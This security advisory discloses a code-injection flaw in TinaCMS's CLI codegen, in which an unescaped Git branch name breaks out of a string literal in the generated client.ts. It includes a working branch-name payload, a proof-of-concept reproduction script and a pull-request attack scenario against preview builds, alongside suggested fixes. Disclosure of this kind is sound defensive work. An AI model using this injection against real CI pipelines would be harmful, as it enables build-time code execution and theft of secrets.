CVE-2026-108259: Tina: Code injection via unescaped Git branch name in generated client source
### Summary `@tinacms/cli` inserts the raw Git branch value into the generated `client.ts` source without escaping or encoding. A Git-valid branch name can close the string literal and inject an arbitrary JavaScript expression that executes when the consumer build imports the generated client module. ### Affected component - **Source (branch read):** `packages/@tinacms/cli/src/cmds/init/templates/config.ts` lines 155–172 — reads `VERCEL_GIT_COMMIT_REF`, `GITHUB_BRANCH`, or `HEAD` into `config.branch` - **Transform (URL build):** `packages/@tinacms/cli/src/next/codegen/index.ts` lines 219–253 — `_createApiUrl()` concatenates the raw branch into the API URL with no `encodeURIComponent` - **Sink (template):** `packages/@tinacms/cli/src/next/codegen/index.ts` lines 363–381 — `genClient()` interpolates the URL into `url: '${apiURL}'` - **Sibling sink:** `packages/@tinacms/cli/src/next/codegen/codegen/plugin.ts` line 55 — `url: "${apiURL}"` (same pattern, double quotes) ### Root cause The codegen template at `index.ts:376` uses: ```ts url: '${apiURL}' ``` where `apiURL` contains the raw branch name. No `JSON.stringify`, `encodeURIComponent`, or string-escape function is applied at any point in the pipeline. A single quote in the branch name closes the string literal and allows expression injection. ### Payload The following is a valid Git branch name (`git check-ref-format` accepts it): ``` x'+(globalThis.__TINA_PROBE='hit')+' ``` ### Generated source (sink) When codegen runs with this branch, the generated `client.ts` contains: ```ts export const client = createClient({ url: 'https://content.tinajs.io/2.4/content/<clientId>/github/x'+(globalThis.__TINA_PROBE='hit')+'', token: '<token>', queries, }); ``` The `'` in the branch name closes the URL string. `+(globalThis.__TINA_PROBE='hit')+` is parsed as a JavaScript expression. The trailing `+'` reopens a string to keep the syntax valid. ### Steps to reproduce **Prerequisites:** Node.js, Git, npm ```bash mkdir /tmp/tinacms-repro && cd /tmp/tinacms-repro git init && git commit --allow-empty -m "init" git branch "x'+(globalThis.__TINA_PROBE='hit')+'" npm init -y && npm install esbuild ``` Create `repro.mjs`: ```js import { transform } from 'esbuild'; import vm from 'vm'; // Simulate VERCEL_GIT_COMMIT_REF containing the malicious branch const branch = "x'+(globalThis.__TINA_PROBE='hit')+'"; // _createApiUrl() logic from index.ts:252 const apiURL = `https://content.tinajs.io/2.4/content/my-client/github/${branch}`; // genClient() template from index.ts:376 const generated = ` import { createClient } from "tinacms/dist/client"; export const client = createClient({ url: '${apiURL}', token: 'xxx' }); `; console.log("Generated source:\n", generated); // Compile (same as consumer build) const compiled = await transform(generated, { loader: 'ts', format: 'cjs' }); // Execute in sandboxed VM const sandbox = { globalThis: {}, module: { exports: {} }, exports: {}, require: () => ({ createClient: (o) => o }), }; vm.createContext(sandbox); vm.runInContext(compiled.code, sandbox); console.log("__TINA_PROBE =", sandbox.globalThis.__TINA_PROBE); // Output: __TINA_PROBE = hit ``` Run: `node repro.mjs` **Result:** `globalThis.__TINA_PROBE` is set to `'hit'`, confirming the injected expression executed during module evaluation. **Negative control:** Repeating with `branch = "feature/safe-branch"` does not trigger injection. ### Impact The injected expression executes with the full privileges of the consumer build process. In a typical Vercel or GitHub Actions preview deployment: - **Build environment variables** are accessible (`process.env`), which may include `NPM_TOKEN`, `VERCEL_TOKEN`, cloud provider secrets, and API keys - **Build artifacts** can be modified, enabling supply-chain compromise of the deployed output - **Network access** is available to exfiltrate data **Attack scenario:** An attacker opens a pull request to any open-source project that uses TinaCMS with preview deployments enabled (Vercel auto-deploys every PR branch). The attacker's branch name contains the payload. The preview build runs Tina codegen, generates the injected `client.ts`, and the attacker's code executes during the build. **Preconditions:** 1. Attacker can create a branch or PR that triggers a consumer build 2. Consumer uses TinaCMS with the scaffolded branch config (reading from `VERCEL_GIT_COMMIT_REF` or equivalent) 3. Tina SDK codegen is enabled (default) ### Severity rationale **High** — build-time arbitrary code execution via a controlled Git ref. Critical was not claimed because no real secret exfiltration or release artifact tampering was demonstrated in this proof; only a benign marker was used. ### Suggested fix 1. Use `JSON.stringify(value)` to safely serialize any runtime value interpolated into generated source templates 2. Apply `encodeURIComponent()` to the branch value before constructing the API URL path segment 3. Apply the same treatment to `apiURL`, `token`, `errorPolicy`, `cacheDir`, and the sibling `AddGeneratedClientFunc` template in `plugin.ts` 4. Consider moving runtime values out of source templates entirely — pass them through a JSON config file that the generated client reads at runtime ### Related advisory [GHSA-4936-9hrh-qqpw](https://github.com/advisories/GHSA-4936-9hrh-qqpw) — TinaCMS Forestry migration generated-source RCE. Different source (Forestry YAML labels), different parser (`__TINA_INTERNAL__` unquoting helper), and different sink (`tina/templates.ts`). This report is not a duplicate.
Recommended action
Recommended action
Upgrade affected packages to a patched version: @tinacms/cli 3.0.0.
Technical details
- Vendor
- Not specified
- Product
- @tinacms/cli
- Exploitation
- none known
- Evidence
- official
Evidence and sources
This record is attributed to GitHub Advisories. Exploitation status and remediation guidance are kept separate from the vulnerability's technical severity.
Open primary source